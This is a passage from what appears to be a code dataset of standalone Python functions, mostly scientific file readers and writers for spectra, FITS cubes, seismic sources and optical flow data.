f = open(inputfile, \"r\")\n # Read header\n try:\n nn = int(f.tell())\n f.readline()\n except BaseException:\n pass\n\n # Read first line\n f.readline()\n # Check format of second line\n test = f.readline()\n f.seek(0) # rewind to begining\n\n # Read data\n if (len(test.split()) == 10) or (len(test.split()) == 6): # test62\n wav, flux = spectrum_test62(f)\n imodel = True\n inu = True\n\n elif len(test.split(\",\")) == 2 or len(test.split(\",\")) == 4: # csv\n wav, flux = spectrum_csv(f)\n imodel = False\n inu = False\n\n elif len(test.split()) == 2: # tsv\n wav, flux = spectrum_tsv(f)\n imodel = False\n inu = False\n\n elif len(test.split()) == 3: # tsv with uncertainties\n wav, flux = spectrum_tsv3(f)\n imodel = False\n inu = False\n\n elif len(test.split()) == 5 or len(test.split()) == 7: # mics format\n wav, flux = spectrum_misc(f)\n imodel = False\n inu = False\n\n else:\n\n raise ValueError(f\"Unknown format for {inputfile}.\")\n\n f.close()\n\n return Spectrum(wav, flux, (imodel, inu))", "def view(filename):\n n, data, data_dB,sr,ch=inputwav(filename)\n t=np.linspace(0,n/sr,n)\n py.close()\n fig, (ax1) = py.subplots(nrows=1) \n ax1.plot(t[0:n:100],data[0:n:100],'k-',linewidth=1,label=filename)\n ax1.legend(loc=1)\n ax1.set_ylabel('Amplitude (Rel. Bit)')\n ax1.set_xlabel('Time (s)')", "def wave_create():\n return _u2i(_pigpio_command(_control, _PI_CMD_WVCRE, 0, 0))", "def generate_data(path=resource_filename('locals', 'data/fake/'), mag_range=(11.13,18)):\n # Get some random spectra\n try:\n files = glob.glob('/user/jfilippazzo/Models/ACES/default/*.fits')[::50]\n except:\n files = glob.glob('/Users/jfilippazzo/Documents/Modules/_DEPRECATED/limb_dark_jeff/limb/specint/*.fits')[::20]\n \n # Make a fake source catalog (with only essential columns for now)\n catpath = os.path.join(path,'fake_source_catalog.ecsv')\n ids = list(range(len(files)))\n coords = SkyCoord([89.7455]*len(ids), [-29.05744]*len(ids), unit='deg', frame='icrs')\n cat = at.QTable([ids,coords], names=('id','icrs_centroid'))\n cat.write(catpath)\n \n # Open the x1d file\n header = fits.getheader(resource_filename('locals', 'data/template_x1d.fits'))\n \n # Make Spectrum objects from models at R=150\n wavelength = np.arange(0.05,2.6,0.0001)[::66]*q.um\n \n # Normalize the spectra to a random F200W magnitude\n spectra = []\n f200w = Bandpass('NIRISS.F200W')\n f200w.wave_units = q.um\n for file in files:\n \n # Create Spectrum\n flux = fits.getdata(file)[-1][::66]*q.erg/q.s/q.cm**2/q.AA\n unc = flux/50.\n spec = Spectrum(wavelength, flux, unc)\n \n # Normalize to F200W\n mag = np.random.uniform(*mag_range)\n norm_spec = spec.renormalize(mag, f200w)\n spectra.append(norm_spec)\n \n # Make a separate x1d file and photometry file for each bandpass\n # containing data for each source\n for band in NIRISS_bands:\n \n try:\n \n # Get the Bandpass object\n bp = Bandpass(band)\n bp.wave_units = q.um\n \n # Make x1d file for spectra\n x1d_file = os.path.join(path,'{}_x1d.fits'.format(band))\n x1d_hdu = fits.HDUList(fits.PrimaryHDU(header=header))\n \n # Make csv file for photometry\n phot_file = os.path.join(path,'{}_phot.csv'.format(band))\n phot_data = at.Table(names=('id','band','magnitude','magnitude_unc'), dtype=(int,'S20',float,float))\n \n # Iterate over spectra\n for id,(f,spec) in enumerate(zip(files,spectra)):\n \n # Trim spectrum to bandpass for x1d file\n spec = Spectrum(*spec.spectrum, trim=[(0*q.um,bp.WavelengthMin*1E-4*q.um),(bp.WavelengthMax*1E-4*q.um,10*q.um)])\n \n # Calculate magnitude and add to photometry table\n mag, mag_unc = spec.synthetic_magnitude(bp, force=True)\n phot_data.add_row([id, band, mag, mag_unc])\n \n # Add source spectrum params for verification\n params = f.split('/')[-1].split('-')\n header['TEFF'] = int(params[0].replace('lte',''))\n header['LOGG'] = float(params[1][:4])\n header['FEH'] = float(params[-6][:-8].split('+')[-1])\n header['FILEPATH'] = f\n header['PUPIL'] = band\n\n # Put spectrum in x1d fits file\n data = fits.BinTableHDU(data=np.rec.array(list(zip(*spec.data)),\n formats='float32,float32,float32',\n names='WAVELENGTH,FLUX,ERROR'),\n header=header)\n data.name = 'EXTRACT1D'\n \n x1d_hdu.append(data)\n \n # Write the photometry file\n phot_data.write(phot_file, format='ascii.csv')\n del phot_data\n \n # Write the x1d file\n x1d_hdu.writeto(x1d_file, overwrite=True)\n del x1d_hdu\n \n except IOError:\n pass", "def convert(infile,arcsec_per_pixel=0.2,sigma_conv=1.,expansion_factor=5,writeout=None,overwrite=False,keep_units=False):\n \n PLATESCALE = 1.2120 # arcsec / mm\n rss = fits.open( infile )\n phdr = rss[1].header\n dhdr = rss[0].header\n data = rss[0].data\n \n conff=dm.read_fibers_extension(phdr)\n bundles_values=conff.bundles.keys()\n sky_bundles=[]\n for bundlei in bundles_values:\n if phdr[\"BUN%03d_T\" % bundlei]=='SKY':\n sky_bundles.append(bundlei)\n \n w0 = dhdr['CRVAL1'] # reference wavelength\n try : dw = dhdr['CRDELT1'] # wavelength step\n except : dw = dhdr['CDELT1'] # wavelength step\n wunit = dhdr['CUNIT1'] # wavelength unit\n wtype = 'WAVE' # type spectra\n\n # define the dimensions of the spaxel array \n Nx, Ny, x0, y0, dx, dy = getspaxdim( data,phdr,sky_bundles,expansion_factor=expansion_factor)\n\n nbin=int(round(float(arcsec_per_pixel)/float(dx)))\n\n\n Nw = dhdr['NAXIS1'] # number of wave. steps\n \n\n \n # initialize an empty 3-d cube (zero everywhere)\n cube = fits.PrimaryHDU()\n #cube.header=rss[0].header \n #cube.header.remove('CRPIX1') \n #cube.header.remove('CRVAL1') \n #cube.header.remove('CUNIT1') \n #cube.header.remove('CTYPE1') \n #cube.header.remove('CRPIX2') \n #cube.header.remove('CRVAL2') \n #cube.header.remove('CDELT2') \n #cube.header.remove('CTYPE2') \n cube.header.update(NAXIS=3)\n cube.header.update(NAXIS1=Nx)\n cube.header.update(NAXIS2=Ny)\n cube.header.update(NAXIS3=Nw)\n cube.header.update(CD1_1=-dx/3600.)\n cube.header.update(CD2_2=dy/3600.)\n cube.header.update(CD3_3=dw)\n cube.header.update(CRPIX1=0)\n cube.header.update(CRPIX2=0)\n cube.header.update(CRPIX3=0)\n cube.header.update(CRVAL1=x0)\n cube.header.update(CRVAL2=y0)\n cube.header.update(CRVAL3=w0)\n\n cube.header.update(CTYPE1='RA---DEG')\n cube.header.update(CTYPE2='DEC--DEG')\n cube.header.update(CTYPE3=wtype)\n cube.header.update(CUNIT3=wunit)\n\n cube.header.update(CD1_2=0)\n cube.header.update(CD1_3=0)\n cube.header.update(CD2_1=0)\n cube.header.update(CD2_3=0)\n cube.header.update(CD3_1=0)\n cube.header.update(CD3_2=0)\n\n\n cube.data = numpy.zeros( (Nw,Ny,Nx) )\n\n # extract each spectrum and place it\n # into the 3-d cube\n for ispec in range(len(data)): \n fib_str='{:3d}'.format(ispec+1)\n fib_str=fib_str.replace(' ','0') \n if not(phdr['FIB'+fib_str+'_B'] in sky_bundles):\n try:\n end_sp=phdr['FIB'+fib_str+'W2'] \n start_sp=phdr['FIB'+fib_str+'W1']\n except:\n if ('start_sp' in locals()):\n print('Warning! FIB'+fib_str+'W1 and W2 information missing in header. Assuming previous fiber wavelength coverage.') \n else: \n end_sp=Nw\n start_sp=1 \n print('Warning! FIB'+fib_str+'W1 and W2 information missing in header. Assuming default wavelength coverage.') \n \n if end_sp!=start_sp:\n spec = data[ispec][:]\n Nwspec = Nw \n \n xpos = (phdr['FIB'+fib_str+'_x']+5.)*PLATESCALE \n ypos = (phdr['FIB'+fib_str+'_y']+5.)*PLATESCALE\n ix = int( round((xpos - x0),3) / dx )\n iy = int( round((ypos - y0),3) / dy )\n \n lambda_arr=w0+dw*numpy.arange(0,Nwspec,1)\n \n if keep_units==True:\n for i in range( start_sp, min(end_sp,Nwspec) ):\n cube.data[i][iy][ix] = spec[i]##same units \n else:\n for i in range( start_sp, min(end_sp,Nwspec) ):\n cube.data[i][iy][ix] = spec[i]*3.00e-5/lambda_arr[i]**2 ## Jy to erg/s/cm**2/A \n else:\n end_sp=Nwspec \n print('1st step') \n sigma_conv_pix=sigma_conv/((dx*nbin)/expansion_factor) \n for i in range( start_sp, min(end_sp,Nwspec)):\n print(str(i)+'/'+str(Nwspec)+' spectral channels',end=\"\\r\")\n cube.data[i]=scipy.ndimage.filters.gaussian_filter(cube.data[i], sigma=sigma_conv_pix)\n \n \n cube_rebin = fits.PrimaryHDU()\n cube_rebin.header=rss[0].header \n cube_rebin.header.remove('CRPIX1') \n cube_rebin.header.remove('CRVAL1') \n cube_rebin.header.remove('CUNIT1') \n cube_rebin.header.remove('CTYPE1') \n cube_rebin.header.remove('CDELT1')\n cube_rebin.header.remove('CRPIX2') \n cube_rebin.header.remove('CRVAL2') \n #cube_rebin.header.remove('CUNIT2') \n cube_rebin.header.remove('CDELT2') \n cube_rebin.header.remove('CTYPE2') \n cube_rebin.header.update(NAXIS=3)\n cube_rebin.header.update(NAXIS1=Nx//nbin)\n cube_rebin.header.update(NAXIS2=Ny//nbin)\n cube_rebin.header.update(NAXIS3=Nw)\n cube_rebin.header.update(CD1_1=-dx*nbin/3600.)\n cube_rebin.header.update(CD2_2=dy*nbin/3600.)\n cube_rebin.header.update(CD3_3=dw)\n cube_rebin.header.update(CRPIX1=0)\n cube_rebin.header.update(CRPIX2=0)\n cube_rebin.header.update(CRPIX3=0)\n cube_rebin.header.update(CRVAL1=x0)\n cube_rebin.header.update(CRVAL2=y0)\n cube_rebin.header.update(CRVAL3=w0)\n \n cube_rebin.header.update(CTYPE1='RA---SIN')\n cube_rebin.header.update(CTYPE2='DEC--SIN')\n cube_rebin.header.update(CTYPE3=wtype)\n cube_rebin.header.update(CUNIT3=wunit)\n cube_rebin.header.update(CUNIT1='deg')\n cube_rebin.header.update(CUNIT2='deg')\n \n cube_rebin.header.update(CD1_2=0)\n cube_rebin.header.update(CD1_3=0)\n cube_rebin.header.update(CD2_1=0)\n cube_rebin.header.update(CD2_3=0)\n cube_rebin.header.update(CD3_1=0)\n cube_rebin.header.update(CD3_2=0)\n cube_rebin.verify('fix')\n if keep_units:\n cube_rebin.header.update(BUNIT= dhdr['BUNIT']) ##the rss one!!\n else:\n cube_rebin.header.update(BUNIT= 'erg/s/cm**2/Angstrom') \n\n\n\n \n cube_rebin.data = numpy.zeros( (Nw,Ny//nbin,Nx//nbin) )\n print('')\n print('2nd step')\n for i in range( 0, Nwspec) : \n shape=cube.data[i].shape \n print(str(i)+'/'+str(Nwspec)+' spectral channels',end=\"\\r\")\n for xi in numpy.arange(0,shape[0],nbin)[:-1]:\n for yj in numpy.arange(0,shape[1],nbin)[:-1]:\n pixel_ij=numpy.sum(cube.data[i][xi:xi+nbin,yj:yj+nbin]) \n cube_rebin.data[i][xi//nbin,yj//nbin]=pixel_ij \n if writeout !=None:\n cube_rebin.writeto(writeout,overwrite=overwrite)\n return( cube_rebin)", "def generate_vec_file(args, path_list, file_name):\n if args.vec != None:\n #If the user wants to create a vec file, so calls opencv to create it.\n command = \" \".join([\"opencv_createsamples -vec\", args.vec,\n \"-info\", os.path.join(path_list, file_name),\n \"-num\", str(args.num), \"-h\", str(args.height),\n \"-w\", str(args.width)])\n execute_commands([command])\n if args.out_img_folder == None:\n \"\"\"If the user don't want to save created samples,\n so deletes the entire folder\"\"\"\n rmtree(os.path.abspath(path_list))", "def from_srf_file(self, filename, normalize=False):\n with open(filename, \"rt\") as f:\n # go to POINTS block\n line = f.readline()\n while 'POINTS' not in line:\n line = f.readline()\n\n npoints = int(line.split()[1])\n sources = []\n\n for _ in np.arange(npoints):\n lon, lat, dep, stk, dip, area, tinit, dt = \\\n map(float, f.readline().split())\n rake, slip1, nt1, slip2, nt2, slip3, nt3 = \\\n map(float, f.readline().split())\n\n dep *= 1e3 # km > m\n area *= 1e-4 # cm^2 > m^2\n slip1 *= 1e-2 # cm > m\n slip2 *= 1e-2 # cm > m\n # slip3 *= 1e-2 # cm > m\n\n nt1, nt2, nt3 = map(int, (nt1, nt2, nt3))\n\n if nt1 > 0:\n line = f.readline()\n while len(line.split()) < nt1:\n line = line + f.readline()\n stf = np.array(line.split(), dtype=float)\n if normalize:\n stf /= np.trapz(stf, dx=dt)\n\n M0 = area * DEFAULT_MU * slip1\n\n sources.append(\n Source.from_strike_dip_rake(\n lat, lon, dep, stk, dip, rake, M0,\n time_shift=tinit, sliprate=stf, dt=dt))\n\n if nt2 > 0:\n line = f.readline()\n while len(line.split()) < nt2:\n line = line + f.readline()\n stf = np.array(line.split(), dtype=float)\n if normalize:\n stf /= np.trapz(stf, dx=dt)\n\n M0 = area * DEFAULT_MU * slip2\n\n sources.append(\n Source.from_strike_dip_rake(\n lat, lon, dep, stk, dip, rake, M0,\n time_shift=tinit, sliprate=stf, dt=dt))\n\n if nt3 > 0:\n raise NotImplementedError('Slip along u3 axis')\n\n return self(pointsources=sources)", "def SingleQubitRBT(qubit: qreg, seqFileDir, analyzedPulse: pulse, add_cals=True):\n\n # Original:\n # # Setup a pulse library\n # pulseLib = [AC(qubit, cliffNum) for cliffNum in range(24)]\n # pulseLib.append(analyzedPulse)\n # measBlock = MEAS(qubit)\n\n # seqs = []\n # for ct in range(10):\n # fileName = 'RBT_Seqs_fast_{0}_F1.txt'.format(ct+1)\n # tmpSeqs = []\n # with open(os.path.join(seqFileDir, fileName),'r') as FID:\n # fileReader = reader(FID)\n # for pulseSeqStr in fileReader:\n # seq = []\n # for pulseStr in pulseSeqStr:\n # seq.append(pulseLib[int(pulseStr)-1])\n # seq.append(measBlock)\n # tmpSeqs.append(seq)\n # seqs += tmpSeqs[:12]*12 + tmpSeqs[12:-12] + tmpSeqs[-12:]*12\n\n # seqsPerFile = 100\n # numFiles = len(seqs)//seqsPerFile\n\n # for ct in range(numFiles):\n # chunk = seqs[ct*seqsPerFile:(ct+1)*seqsPerFile]\n # # Tack on the calibration scalings\n # if add_cals:\n # numCals = 4\n # chunk += [[Id(qubit), measBlock]]*numCals + [[X(qubit), measBlock]]*numCals\n # fileNames = compile_to_hardware(chunk, 'RBT/RBT', suffix='_{0}'.format(ct+1))\n\n pulseSeqStrs = []\n for ct in range(10):\n fileName = 'RBT_Seqs_fast_{0}_F1.txt'.format(ct+1)\n tmpSeqs = []\n with open(os.path.join(seqFileDir, fileName),'r') as FID:\n fileReader = reader(FID)\n for pulseSeqStr in fileReader:\n tmpSeqs.append(pulseSeqStr)\n pulseSeqStrs = tmpSeqs[:12]*12 + tmpSeqs[12:-12] + tmpSeqs[-12:]*12\n\n numSeqs = len(pulseSeqStrs)\n seqsPerFile = 100\n numFiles = numSeqs//seqsPerFile\n numCals = 4\n\n for ct in range(numFiles):\n for s in range(seqsPerFile):\n init(qubit)\n seqStr = pulseSeqStrs[ct*seqsPerFile+s]\n getPulseSeq(qubit, seqStr)\n if add_cals:\n # Add numCals calibration scalings\n for _ in range(numCals):\n init(qubit)\n Id(qubit)\n MEAS(qubit)\n\n init(qubit)\n X(qubit)\n MEAS(qubit)", "def get_input(inputfile, ndim, radii):\n\n d = readdump(inputfile, ndim)\n d.read_onefile()\n results = []\n for n in range(d.SnapshotNumber):\n ParticleRadii = np.array(pd.Series(d.ParticleType[n]).map(radii))\n PositionRadii = np.column_stack((d.Positions[n], ParticleRadii))\n voroinput = np.column_stack((np.arange(d.ParticleNumber[n]) + 1, PositionRadii))\n results.append(voroinput)\n\n return (results, d.Boxbounds)", "def signalroisample(filename,obs):\n from samplingdist import readworkspace,readfile\n #f,w,obsdict,modeldict,databkgdict,datasigdict = readworkspace(filename)\n f,obsdict,modeldict,databkgdict,datasigdict = readfile(filename)\n if not obsdict.has_key(obs):\n raise RuntimeError(\"Observable '%s' not defined\" % obs)\n sd = ObservableSamplingProb(obsdict[obs])\n sd.setupmodel('bkg','negative_binomial_pdf')\n sd.setupmodel('sig','negative_binomial_sum_pdf')\n\n datasig = datasigdict['dvsig_'+obs]\n databkg = databkgdict['dvbkg_'+obs]\n sd.fitTo(datasig,'sig')\n sd.fitTo(databkg,'bkg')\n\n samplename = filename.split('_')[1]\n sd.plot(samplename,datasig,'sig',sample=samplename+'_sig')\n sd.plot(samplename,databkg,'bkg',sample=samplename+'_bkg')\n\n nfile = filename.split('_')[1]+'_bkgsig_'+obs+'_ws.root'\n sd.update('w',nfile,[datasig,databkg])", "def add_pixel_fn(filename: str, resample_name: str) -> None:\n\n header = \"\"\" <VRTRasterBand dataType=\"Byte\" band=\"1\" subClass=\"VRTDerivedRasterBand\">\"\"\"\n contents = \"\"\"\n <PixelFunctionType>{0}</PixelFunctionType>\n <PixelFunctionLanguage>Python</PixelFunctionLanguage>\n <PixelFunctionCode><![CDATA[{1}]]>\n </PixelFunctionCode>\"\"\"\n\n lines = open(filename, 'r').readlines()\n lines[3] = header # FIX ME: 3 is a hand constant\n lines.insert(4, contents.format(resample_name,\n get_resample(resample_name)))\n open(filename, 'w').write(\"\".join(lines))", "def dorv(visitfiles) :\n # last list elements has configuration variables in a tuple\n allvisit = visitfiles[0]\n load = visitfiles[1]\n field=visitfiles[-1][0]\n obj=visitfiles[-1][1].decode('UTF-8')\n clobber=visitfiles[-1][2]\n verbose=visitfiles[-1][3]\n tweak=visitfiles[-1][4]\n plot=visitfiles[-1][5]\n windows=visitfiles[-1][6]\n #rvrange=visitfiles[-1][7]\n if tweak: suffix='_tweak'\n else : suffix='_out'\n outdir = os.path.dirname(load.filename('Star',field=field,obj=obj))\n outdir = outdir.replace('/stars/','/rv/')\n\n if os.path.exists(outdir+'/'+obj+suffix+'.pkl') and not clobber:\n print(obj,' already done')\n fp=open(outdir+'/'+obj+suffix+'.pkl','rb')\n try: \n out=pickle.load(fp)\n fp.close()\n return out\n except: \n print('error loading: ', obj+suffix+'.pkl')\n pass\n\n speclist=[]\n pixelmask=bitmask.PixelBitMask()\n badval=pixelmask.badval()|pixelmask.getval('SIG_SKYLINE')|pixelmask.getval('LITTROW_GHOST')\n \n # if we have a significant number of low S/N visits, combine first using\n # barycentric correction only, use that to get an estimate of systemic\n # velocity, then do RV determination restricting RVs to within 50 km/s\n # of estimate. This seems to help significant for faint visits\n lowsnr_visits=np.where(allvisit['SNR']<10)[0]\n if (len(lowsnr_visits) > 1) & (len(lowsnr_visits)/len(allvisit) > 0.1) :\n try :\n apstar_bc=visitcomb(allvisit,bconly=True,load=load,write=False,dorvfit=False) \n apstar_bc.setmask(badval)\n spec=doppler.Spec1D(apstar_bc.flux[0,:],err=apstar_bc.err[0,:],bitmask=apstar_bc.bitmask[0,:],\n mask=apstar_bc.mask[0,:],wave=apstar_bc.wave,lsfpars=np.array([0]),\n lsfsigma=apstar_bc.wave/22500/2.354,instrument='APOGEE',\n filename=apstar_bc.filename)\n print('running BC jointfit for :',obj)\n out= doppler.rv.jointfit([spec],verbose=verbose,plot=plot,tweak=tweak,maxvel=[-500,500])\n rvrange=[out[1][0]['vrel']-50,out[1][0]['vrel']+50]\n except :\n print(' BC jointfit failed')\n rvrange=[-500,500]\n elif allvisit['H'].max() > 13.5 : \n # if it's faint, restrict to +/- 500 km/s\n rvrange=[-500,500]\n else :\n # otherwise, restrict to +/ 1000 km/s\n rvrange=[-1000,1000]\n\n for i in range(len(allvisit)) :\n\n # load all of the visits into doppler Spec1D objects\n if load.telescope == 'apo1m' :\n visitfile= load.allfile('Visit',plate=allvisit['PLATE'][i],\n mjd=allvisit['MJD'][i],reduction=allvisit['APOGEE_ID'][i])\n else :\n visitfile= load.allfile('Visit',plate=int(allvisit['PLATE'][i]),\n mjd=allvisit['MJD'][i],fiber=allvisit['FIBERID'][i])\n spec=doppler.read(visitfile,badval=badval)\n\n if windows is not None :\n # if we have spectral windows to mask, do so here\n for ichip in range(3) :\n mask = np.full_like(spec.mask[:,ichip],True)\n gd = []\n for window in windows :\n gd.extend(np.where((spec.wave[:,ichip] > window[0]) & (spec.wave[:,ichip] < window[1]))[0])\n mask[gd] = False\n spec.mask[:,ichip] |= mask\n \n if spec is not None : speclist.append(spec)\n\n # now do the doppler jointfit to get RVs\n # dump empty pickle to stand in case of failure (to prevent redo if not clobber)\n try:\n # dump empty pickle to stand in case of failure (to prevent redo if not clobber)\n fp=open(outdir+'/'+obj+suffix+'.pkl','wb')\n pickle.dump(None,fp)\n fp.close()\n print('running jointfit for : {:s} rvrange:[{:.1f},{:.1f}] nvisits: {:d}'.format(obj,*rvrange,len(speclist)))\n out= doppler.rv.jointfit(speclist,maxvel=rvrange,verbose=verbose,\n plot=plot,saveplot=plot,outdir=outdir+'/',tweak=tweak)\n print('running decomp for :',obj)\n gout = gauss_decomp(out[1],phase='two',filt=True)\n fp=open(outdir+'/'+obj+suffix+'.pkl','wb')\n pickle.dump([out,gout],fp)\n fp.close()\n print('running plots for :',obj,outdir)\n try : os.makedirs(outdir+'/plots/')\n except : pass\n dop_plot(outdir+'/plots/',obj,out,decomp=gout)\n except KeyboardInterrupt : \n raise\n except ValueError as err:\n print('Exception raised in dorv for: ', field, obj)\n print(\"ValueError: {0}\".format(err))\n return\n except RuntimeError as err:\n print('Exception raised in dorv for: ', field, obj)\n print(\"Runtime error: {0}\".format(err))\n return\n except :\n raise\n print('Exception raised in dorv for: ', field, obj)\n return\n\n # return summary RV info, visit RV info, decomp info \n return [out[0:2],gout]", "def dirToRAD(directory, toFile):\n #Open Directory\n trainFiles = [file for file in os.listdir(directory) if file.endswith(\".txt\")]\n fOut = open(toFile, 'w')\n for file in trainFiles:\n print(file)\n rawData = getRawData(directory+file)\n if 'rad' in toFile:\n data = rawToRAD(rawData)\n elif 'cust' in toFile:\n data = rawToCust(rawData)\n else:\n print('ERROR. Transformation to ' + toFile + ' failed. Please enter a string containing cust for custom representation or rad for RAD format.')\n #print('Raw:', rawData)\n #print('RAD:', RADdata)\n label = int(file[1:3])\n if len(sys.argv) > 1:\n enumData = enumerate(getHistogram(data, file, int(sys.argv[1])))\n else:\n enumData = enumerate(getHistogram(data, file))\n fOut.write(str(label) + ' ')\n fOut.writelines([\" %d:%s\" % (index+1, elem) for index,elem in enumData])\n fOut.write('\\n')\n fOut.close()", "def rebin_spectra(source):\n # Unpack arguments using the 'source' label; all are assumed to be in km/s\n v_lo, v_hi, new_dv = velocity_ranges[source]\n # Load data cube\n data_filename = os.path.abspath(data_filepaths[source])\n cube = SpectralCube.read(data_filename)\n # Check units\n try:\n # See if the cube can be converted to Kelvins easily\n cube = cube.to(u.K)\n except:\n # Check if it looks like a temperature\n old_bunit = cube.header['BUNIT']\n if \"K (Ta*)\" in old_bunit:\n cube._unit = u.K\n print(f\"Data unit {cube.unit} assigned, based on the header BUNIT {old_bunit}.\")\n else:\n # Don't bother trying to fix it, leave it alone\n print(f\"Data units <{cube._unit}> aren't equivalent to Kelvins, leaving them alone\")\n # Get current channel width (np.diff should return an array of all the same value, so np.mean is overkill but it doesn't matter)\n old_dv = np.mean(np.diff(cube.spectral_axis))\n # Construct a box filter to average the channels\n # Filter width is number of channels; if rebinning from 0.1 km/s to 1 km/s, filter is 10 channels\n # Need to add km/s units to new_dv (old_dv already has units)\n filter_width = np.abs(((new_dv*u.km/u.s) / old_dv).decompose().to_value())\n # Round to nearest integer\n filter_width = np.around(filter_width, 0)\n # Make filter using astropy.convolution.Box1DKernel\n filter = Box1DKernel(filter_width)\n # Define the new spectral axis using the inclusive limits and the new channel width\n new_spectral_axis = np.arange(v_lo, v_hi+new_dv, new_dv) * u.km/u.s\n\n # Do the computationally intensive work\n print(\"Starting spectral smooth\")\n cube = cube.spectral_smooth(filter)\n print(\"Finished spectral smooth. Starting spectral rebin.\")\n cube = cube.spectral_interpolate(new_spectral_axis)\n print(\"Finished spectral rebin.\")\n # Create savename with \"rebin\" and the channel width inserted before the filetype suffix\n save_filename = data_filename.replace(\".fits\", f\".rebin{new_dv:d}kms.fits\")\n cube.write(save_filename, format='fits')", "def make(input_filepath, output_filepath) -> None:\n logger = logging.getLogger(__name__)\n logger.info('making final data set from raw data')", "def flow_write(filename,uv,v=None):\n TAG_CHAR = 'PIEH'\n nBands = 2\n\n if v is None:\n assert(uv.ndim == 3)\n assert(uv.shape[2] == 2)\n u = uv[:,:,0]\n v = uv[:,:,1]\n else:\n u = uv\n\n assert(u.shape == v.shape)\n height,width = u.shape\n f = open(filename,'wb')\n # write the header\n f.write(TAG_CHAR)\n np.array(width).astype(np.int32).tofile(f)\n np.array(height).astype(np.int32).tofile(f)\n # arrange into matrix form\n tmp = np.zeros((height, width*nBands))\n tmp[:,np.arange(width)*2] = u\n tmp[:,np.arange(width)*2 + 1] = v\n tmp.astype(np.float32).tofile(f)\n f.close()", "def flow_write(filename,uv,v=None):\n nBands = 2\n\n if v is None:\n assert(uv.ndim == 3)\n assert(uv.shape[2] == 2)\n u = uv[:,:,0]\n v = uv[:,:,1]\n else:\n u = uv\n\n assert(u.shape == v.shape)\n height,width = u.shape\n f = open(filename,'wb')\n TAG_CHAR = b'PIEH'\n f.write(TAG_CHAR)\n np.array(width).astype(np.int32).tofile(f)\n np.array(height).astype(np.int32).tofile(f)\n # arrange into matrix form\n tmp = np.zeros((height, width*nBands))\n tmp[:,np.arange(width)*2] = u\n tmp[:,np.arange(width)*2 + 1] = v\n tmp.astype(np.float32).tofile(f)\n f.close()", "def modconvert(infile, outfile, scale_factor=1.0):\n index, freq, brightness_temp, flux, rj_temp = read_infile(infile)\n\n wave, flux, temp = sort_spectrum(freq, flux, brightness_temp)\n\n scaled_flux = scale_factor * flux\n\n plot_scaled_spectrum(wave, scaled_flux, scale_factor, infile)\n\n write_scaled_spectrum(wave, scaled_flux, scale_factor, temp,\n infile, outfile)\n\n model = pd.DataFrame({'wavelength': wave, 'flux': scaled_flux,\n 't_br': temp})\n return model", "def spectrum_parser():\n from tools import file_importer, file_outporter\n from random import random\n # from math import log10\n \n print(\"this is spectrum parser\")\n \n relPath = \"bob/processed/OST-24-05-2017_combined.csv\"\n outPath = \"bob/processed/OST-24-05-2017_combined_no0_spectrum.csv\"\n inpF = file_importer(relPath)\n outF = file_outporter(outPath) \n headerFlag = True\n rowCount = 0\n for inpLine in inpF:\n if headerFlag: \n headerFlag = False\n spColCount = 0\n inpList = inpLine.split(\"\\t\")\n for headerI in inpList:\n if \"Peptides ST-1|Peptides ST-2|Peptides ST-3\" == headerI:\n break\n else: spColCount += 1\n outF.write(\"ID,Protein ID, Gene name,\") # write header into output file\n for headI in inpList[spColCount].split(\"|\"):\n outF.write(headI + \",\")\n for headI in inpList[spColCount + 1].split(\"|\")[:-1]:\n outF.write(headI + \",\")\n outF.write(inpList[spColCount + 1].split(\"|\")[-1] + \"\\n\")\n rowCount += 1\n continue\n \n outF.write(str(rowCount) + \",\")\n \n inpLine = inpLine.strip()\n inpItems = inpLine.split(\"\\t\")\n inpName = max(inpItems[0].split(\"|\"), key=len) # get unique protein ID\n inpGeneName = max(inpItems[6].split(\"|\"), key=len) # and gene name\n outF.write(inpName + \",\" + inpGeneName + \",\")\n \n inpSP = inpItems[spColCount].split(\"|\") + inpItems[spColCount + 1].split(\"|\") # get lfq intensity scores\n # print inpSP\n for lfqI in inpSP[:-1]: # write lfq values\n if lfqI == \"_\" or lfqI == \"0\":\n outF.write(str(random()) + \",\") ################## try with log10 values this time\n else:\n try:\n outF.write(str(lfqI) + \",\")\n except ValueError:\n print(inpItems)\n raise\n \n if inpSP[-1] == \"_\" or inpSP[-1] == \"0\": outF.write(str(random()) + \"\\n\")\n else: outF.write(inpSP[-1] + \"\\n\")\n \n \n \n rowCount += 1", "def read_raytomo_dbase(self, inh5fname, runid, dtype='ph', wtype='ray', create_header=True, Tmin=-999, Tmax=999, verbose=False):\n if dtype is not 'ph' and dtype is not 'gr':\n raise ValueError('data type can only be ph or gr!')\n if wtype is not 'ray' and wtype is not 'lov':\n raise ValueError('wave type can only be ray or lov!')\n stalst = self.waveforms.list()\n if len(stalst) == 0:\n print 'Inversion with surface wave datasets only, not added yet!'\n return\n indset = h5py.File(inh5fname)\n #--------------------------------------------\n # header information from input hdf5 file\n #--------------------------------------------\n dataid = 'reshaped_qc_run_'+str(runid)\n pers = indset.attrs['period_array']\n grp = indset[dataid]\n isotropic = grp.attrs['isotropic']\n org_grp = indset['qc_run_'+str(runid)]\n minlon = indset.attrs['minlon']\n maxlon = indset.attrs['maxlon']\n minlat = indset.attrs['minlat']\n maxlat = indset.attrs['maxlat']\n if isotropic:\n print 'isotropic inversion results do not output gaussian std!'\n return\n dlon_HD = org_grp.attrs['dlon_HD']\n dlat_HD = org_grp.attrs['dlat_HD']\n dlon = org_grp.attrs['dlon']\n dlat = org_grp.attrs['dlat']\n if create_header:\n inv_header = {'minlon': minlon, 'maxlon': maxlon, 'minlat': minlat, 'maxlat': maxlat,\n 'dlon': dlon, 'dlat': dlat, 'dlon_HD': dlon_HD, 'dlat_HD': dlat_HD}\n self.add_auxiliary_data(data=np.array([]), data_type='Header', path='raytomo', parameters=inv_header)\n self._get_lon_lat_arr(path='raytomo', hd=True)\n for staid in stalst:\n netcode, stacode = staid.split('.')\n staid_aux = netcode+'_'+stacode\n stla, elev, stlo = self.waveforms[staid].coordinates.values()\n if stlo < 0.:\n stlo += 360.\n if stla > maxlat or stla < minlat or stlo > maxlon or stlo < minlon:\n print 'WARNING: station: '+ staid+', lat = '+str(stla)+' lon = '+str(stlo)+', out of the range of tomograpic maps!'\n continue\n disp_v = np.array([])\n disp_un = np.array([])\n T = np.array([])\n #-----------------------------\n # determine the indices\n #-----------------------------\n ind_lon = np.where(stlo<=self.lons)[0][0]\n find_lon = ind_lon \n ind_lat = np.where(stla<=self.lats)[0][0]\n find_lat = ind_lat\n # point 1\n distmin, az, baz = obspy.geodetics.gps2dist_azimuth(stla, stlo, self.lats[ind_lat], self.lons[ind_lon]) 